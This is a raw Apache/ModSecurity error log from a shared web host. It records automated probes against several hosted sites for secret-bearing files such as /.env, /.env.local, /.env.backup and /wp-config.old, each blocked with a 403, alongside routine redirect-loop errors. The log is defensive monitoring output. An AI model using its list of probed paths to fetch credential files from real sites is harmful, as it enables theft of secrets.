[Mon May 11 18:56:45.397367 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /wp-config.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/wp-config.old"] [unique_id "agIKTTP5Q_-MBliRCAw8wQAAAAI"]
[Mon May 11 18:56:45.397579 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/wp-config.old"] [unique_id "agIKTTP5Q_-MBliRCAw8wQAAAAI"]
[Mon May 11 18:56:45.453913 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKTTP5Q_-MBliRCAw8wQAAAAI"]
[Mon May 11 18:56:47.322436 2026] [core:error] [pid 1501883:tid 1501896] [client 85.11.167.49:58399] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:47.322474 2026] [core:error] [pid 1501883:tid 1501896] [client 85.11.167.49:58399] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:48.933935 2026] [core:error] [pid 1502013:tid 1502050] [client 85.11.167.49:56314] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:48.934669 2026] [core:error] [pid 1502013:tid 1502050] [client 85.11.167.49:56314] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:51.643288 2026] [core:error] [pid 1501883:tid 1501889] [client 85.11.167.49:64380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:51.643321 2026] [core:error] [pid 1501883:tid 1501889] [client 85.11.167.49:64380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:55.863491 2026] [core:error] [pid 1501883:tid 1501895] [client 85.11.167.49:52024] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:55.863523 2026] [core:error] [pid 1501883:tid 1501895] [client 85.11.167.49:52024] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:57.367554 2026] [core:error] [pid 1416109:tid 1416137] [client 85.11.167.49:57169] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:57.367588 2026] [core:error] [pid 1416109:tid 1416137] [client 85.11.167.49:57169] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:00.373721 2026] [core:error] [pid 1424905:tid 1424908] [client 85.11.167.49:54808] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:00.373761 2026] [core:error] [pid 1424905:tid 1424908] [client 85.11.167.49:54808] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:02.348900 2026] [core:error] [pid 1416109:tid 1416142] [client 85.11.167.49:63929] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:02.348936 2026] [core:error] [pid 1416109:tid 1416142] [client 85.11.167.49:63929] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:04.537542 2026] [core:error] [pid 1502013:tid 1502044] [client 85.11.167.49:53227] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:04.537583 2026] [core:error] [pid 1502013:tid 1502044] [client 85.11.167.49:53227] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:06.439875 2026] [core:error] [pid 1501831:tid 1501845] [client 85.11.167.49:53466] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:06.439919 2026] [core:error] [pid 1501831:tid 1501845] [client 85.11.167.49:53466] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:10.516760 2026] [core:error] [pid 1502013:tid 1502035] [client 85.11.167.49:65459] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:10.516788 2026] [core:error] [pid 1502013:tid 1502035] [client 85.11.167.49:65459] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:13.647322 2026] [core:error] [pid 1416109:tid 1416129] [client 85.11.167.49:51509] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:13.647347 2026] [core:error] [pid 1416109:tid 1416129] [client 85.11.167.49:51509] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:15.181423 2026] [security2:error] [pid 1416109:tid 1416148] [client 85.11.167.49:52622] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.com"] [uri "/.env"] [unique_id "agIKa1V4kyjgo4bQBUiJkAAAANI"]
[Mon May 11 18:57:15.181631 2026] [security2:error] [pid 1416109:tid 1416148] [client 85.11.167.49:52622] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.com"] [uri "/.env"] [unique_id "agIKa1V4kyjgo4bQBUiJkAAAANI"]
[Mon May 11 18:57:15.182030 2026] [core:error] [pid 1416109:tid 1416148] [client 85.11.167.49:52622] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:15.182192 2026] [security2:error] [pid 1416109:tid 1416148] [client 85.11.167.49:52622] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.com"] [uri "/.env"] [unique_id "agIKa1V4kyjgo4bQBUiJkAAAANI"]
[Mon May 11 18:57:17.484424 2026] [core:error] [pid 1501831:tid 1501841] [client 85.11.167.49:53704] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:17.484456 2026] [core:error] [pid 1501831:tid 1501841] [client 85.11.167.49:53704] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:19.125752 2026] [security2:error] [pid 1501883:tid 1501885] [client 85.11.167.49:60586] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.com"] [uri "/.env.example"] [unique_id "agIKbzP5Q_-MBliRCAw8_QAAAAA"]
[Mon May 11 18:57:19.125981 2026] [security2:error] [pid 1501883:tid 1501885] [client 85.11.167.49:60586] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.com"] [uri "/.env.example"] [unique_id "agIKbzP5Q_-MBliRCAw8_QAAAAA"]
[Mon May 11 18:57:19.126418 2026] [core:error] [pid 1501883:tid 1501885] [client 85.11.167.49:60586] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:19.126553 2026] [security2:error] [pid 1501883:tid 1501885] [client 85.11.167.49:60586] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.com"] [uri "/.env.example"] [unique_id "agIKbzP5Q_-MBliRCAw8_QAAAAA"]
[Mon May 11 18:57:21.634399 2026] [core:error] [pid 1416109:tid 1416141] [client 85.11.167.49:54868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:21.634437 2026] [core:error] [pid 1416109:tid 1416141] [client 85.11.167.49:54868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:23.020621 2026] [security2:error] [pid 1416109:tid 1416138] [client 85.11.167.49:64133] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.com"] [uri "/.env.local"] [unique_id "agIKc1V4kyjgo4bQBUiJmQAAAMg"]
[Mon May 11 18:57:23.020857 2026] [security2:error] [pid 1416109:tid 1416138] [client 85.11.167.49:64133] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.com"] [uri "/.env.local"] [unique_id "agIKc1V4kyjgo4bQBUiJmQAAAMg"]
[Mon May 11 18:57:23.021260 2026] [core:error] [pid 1416109:tid 1416138] [client 85.11.167.49:64133] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:23.021405 2026] [security2:error] [pid 1416109:tid 1416138] [client 85.11.167.49:64133] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.com"] [uri "/.env.local"] [unique_id "agIKc1V4kyjgo4bQBUiJmQAAAMg"]
[Mon May 11 18:57:26.124922 2026] [core:error] [pid 1501883:tid 1501906] [client 85.11.167.49:62842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:26.124954 2026] [core:error] [pid 1501883:tid 1501906] [client 85.11.167.49:62842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:28.081644 2026] [security2:error] [pid 1501883:tid 1501894] [client 85.11.167.49:50342] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.com"] [uri "/.env.backup"] [unique_id "agIKeDP5Q_-MBliRCAw9EQAAAAk"]
[Mon May 11 18:57:28.081867 2026] [security2:error] [pid 1501883:tid 1501894] [client 85.11.167.49:50342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.com"] [uri "/.env.backup"] [unique_id "agIKeDP5Q_-MBliRCAw9EQAAAAk"]
[Mon May 11 18:57:28.082321 2026] [core:error] [pid 1501883:tid 1501894] [client 85.11.167.49:50342] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:28.082470 2026] [security2:error] [pid 1501883:tid 1501894] [client 85.11.167.49:50342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.com"] [uri "/.env.backup"] [unique_id "agIKeDP5Q_-MBliRCAw9EQAAAAk"]
[Mon May 11 18:57:30.169386 2026] [authz_core:error] [pid 1502013:tid 1502031] [client 47.128.23.30:55494] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/theme-compat/error_log
[Mon May 11 18:57:30.930391 2026] [security2:error] [pid 1502013:tid 1502060] [client 85.11.167.49:53421] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env"] [unique_id "agIKepYn-x0CHsbEbP2AWwAAAJM"]
[Mon May 11 18:57:30.930577 2026] [security2:error] [pid 1502013:tid 1502060] [client 85.11.167.49:53421] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env"] [unique_id "agIKepYn-x0CHsbEbP2AWwAAAJM"]
[Mon May 11 18:57:30.930958 2026] [core:error] [pid 1502013:tid 1502060] [client 85.11.167.49:53421] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:30.931112 2026] [security2:error] [pid 1502013:tid 1502060] [client 85.11.167.49:53421] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env"] [unique_id "agIKepYn-x0CHsbEbP2AWwAAAJM"]
[Mon May 11 18:57:32.282064 2026] [security2:error] [pid 1424905:tid 1424922] [client 85.11.167.49:50798] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.com"] [uri "/config/.env"] [unique_id "agIKfIW8yzYoWG_eyCXJ1QAAAU4"]
[Mon May 11 18:57:32.282304 2026] [security2:error] [pid 1424905:tid 1424922] [client 85.11.167.49:50798] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.com"] [uri "/config/.env"] [unique_id "agIKfIW8yzYoWG_eyCXJ1QAAAU4"]
[Mon May 11 18:57:32.283780 2026] [core:error] [pid 1424905:tid 1424922] [client 85.11.167.49:50798] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:32.290314 2026] [security2:error] [pid 1424905:tid 1424922] [client 85.11.167.49:50798] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.com"] [uri "/config/.env"] [unique_id "agIKfIW8yzYoWG_eyCXJ1QAAAU4"]
[Mon May 11 18:57:34.906660 2026] [security2:error] [pid 1501883:tid 1501899] [client 170.106.165.186:51246] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.totalcloud.fr"] [uri "/"] [unique_id "agIKfjP5Q_-MBliRCAw9FgAAAA4"]
[Mon May 11 18:57:34.908111 2026] [autoindex:error] [pid 1501883:tid 1501899] [client 170.106.165.186:51246] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 18:57:35.110593 2026] [security2:error] [pid 1502013:tid 1502036] [client 85.11.167.49:51869] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env.example"] [unique_id "agIKf5Yn-x0CHsbEbP2AYAAAAIc"]
[Mon May 11 18:57:35.110776 2026] [security2:error] [pid 1502013:tid 1502036] [client 85.11.167.49:51869] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env.example"] [unique_id "agIKf5Yn-x0CHsbEbP2AYAAAAIc"]
[Mon May 11 18:57:35.111202 2026] [core:error] [pid 1502013:tid 1502036] [client 85.11.167.49:51869] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:35.111374 2026] [security2:error] [pid 1502013:tid 1502036] [client 85.11.167.49:51869] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env.example"] [unique_id "agIKf5Yn-x0CHsbEbP2AYAAAAIc"]
[Mon May 11 18:57:43.758042 2026] [security2:error] [pid 1424905:tid 1424909] [client 85.11.167.49:56412] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env.local"] [unique_id "agIKh4W8yzYoWG_eyCXJ3wAAAUE"]
